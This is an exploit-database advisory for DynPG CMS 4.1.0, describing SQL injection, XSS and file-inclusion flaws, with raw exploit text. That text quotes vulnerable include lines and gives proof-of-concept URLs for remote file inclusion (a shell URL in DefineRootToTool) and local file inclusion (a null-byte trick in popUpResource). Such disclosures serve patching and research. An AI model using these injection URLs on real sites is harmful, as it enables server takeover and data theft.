header-logo
Suggest Exploit
vendor:
DynPG CMS
by:
eidelweiss
8,1
CVSS
HIGH
Multiple
89, 79, 94
CWE
Product Name: DynPG CMS
Affected Version From: 4.1.0
Affected Version To: 4.1.0
Patch Exists: YES
Related CWE: CVE-2009-4010, CVE-2009-4011, CVE-2009-4012
CPE: a:dynpg:dynpg_cms
Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-4010/https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-4010/https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-4012/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

DynPG CMS v4.1.0 Multiple Vulnerability

DynPG CMS v4.1.0 is prone to multiple vulnerabilities, including SQL injection, cross-site scripting, and remote file inclusion. The SQL injection vulnerability exists due to insufficient sanitization of user-supplied data in the 'id' parameter of the 'index.php' script. An attacker can exploit this issue to manipulate SQL queries and gain access to sensitive information. The cross-site scripting vulnerability exists due to insufficient sanitization of user-supplied data in the 'id' parameter of the 'index.php' script. An attacker can exploit this issue to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. The remote file inclusion vulnerability exists due to insufficient sanitization of user-supplied data in the 'id' parameter of the 'index.php' script. An attacker can exploit this issue to include arbitrary remote files and execute arbitrary PHP code in the context of the webserver process.

Mitigation:

Users should upgrade to the latest version of DynPG CMS.
Source

Exploit-DB raw data:

########################################################
	DynPG CMS v4.1.0 Multiple Vulnerability
########################################################
 
    fucking the Web Apps [attack edition]
 
 ____                  __                              __    __               
/\  _`\               /\ \      __                    /\ \__/\ \              
\ \ \L\_\__  __    ___\ \ \/'\ /\_\    ___      __    \ \ ,_\ \ \___      __  
 \ \  _\/\ \/\ \  /'___\ \ , < \/\ \ /' _ `\  /'_ `\   \ \ \/\ \  _ `\  /'__`\
  \ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \   \ \ \_\ \ \ \ \/\  __/
   \ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \   \ \__\\ \_\ \_\ \____\
    \/_/  \/___/  \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \   \/__/ \/_/\/_/\/____/
                                                /\____/                       
                                                \_/__/                        
 __      __          __          ______                       Hack0wn! Security Project    
/\ \  __/\ \        /\ \        /\  _  \                          
\ \ \/\ \ \ \     __\ \ \____   \ \ \L\ \  _____   _____     ____ 
 \ \ \ \ \ \ \  /'__`\ \ '__`\   \ \  __ \/\ '__`\/\ '__`\  /',__\
  \ \ \_/ \_\ \/\  __/\ \ \L\ \   \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\
   \ `\___x___/\ \____\\ \_,__/    \ \_\ \_\ \ ,__/\ \ ,__/\/\____/
    '\/__//__/  \/____/ \/___/      \/_/\/_/\ \ \/  \ \ \/  \/___/
                                             \ \_\   \ \_\        
                                              \/_/    \/_/         


[+]Title : 	DynPG CMS v4.1.0 Multiple Vulnerability
[+]Version: 	4.1.0 (Other or lower versions may also be affected)
[+]Download: 	http://www.dynpg.org/download_en.php
[+]License: 	GNU / GPL
[+]Metode : 	Multiple
[+]Author: 	eidelweiss
[!]Work If: 	register_globals = On
		magic_quotes = Off

[*]Special to Syabilla_putri (I miss u so much to)[*]

[!]Thank`s Fly To:

[~] Jose Luis Gongora Fernandez a.k.a JosS - sp3x (securityreason)
[~] exploit-db team (loneferret - Exploits - dookie2000ca)
[~] Inj3ct0r.com r0073r & 0x1D [Inj3ct0r Exploit Database], [D]eal [C]yber

########################################################

Description:

DynPG is used to upload and manage dynamic web content similar to other content management systems.
DynPG however differs from other CMS, because it is embedded directly into websites.
The software was originally developed to realize designs that are created with Adobe Photoshop, Adobe Fireworks, Adobe Illustrator or any other graphics software.
The layout is created with an editor like Adobe Dreamweaver or Adobe GoLive or even as simple code.
After that, code snippets are placed at those points, where dynamically generated content (like articles, galleries, blogs or other dynamic content) shall be generated.
It provides a convenient way to extend existing websites with dynamic content. DynPG provides a template engine, but also supports existing CSS layouts.

########################################################

	-=[ Vuln C0de ]=-

[!] counter.php

		require_once $GLOBALS["DefineRootToTool"]."config.php";	// line 15
		require_once $GLOBALS["DefineRootToTool"]."connectdb.php";	// line 16


[!] /plugins/DPGguestbook/guestbookaction.php

<?php
    function dynPG_Guestbook_proceedREQ()
    {
      require_once $GLOBALS['DynPG']->PathToRoot .'config.php';
      require_once $GLOBALS['DynPG']->PathToRoot .'defines.php';
      require_once $GLOBALS['DynPG']->PathToRoot .'connectdb.php';


[!] /backendpopup/popup.php

	require './resources/' . $get_popUpResource . '/index.res.php';	// line 36

[!] etc , etc , etc


	-=[ Proof Of Concept ]=-
	
	http://127.0.0.1/dynpg_path/counter.php?inc=whtever&DefineRootToTool=[shell] <-- RFI

	http://127.0.0.1/dynpg_path/backendpopup/popup.php?popUpResource=[LFI]%00

	etc , etc , etc
	
######################=[E0F]=#############################

Navigation

Suggest Exploit

Services By CQR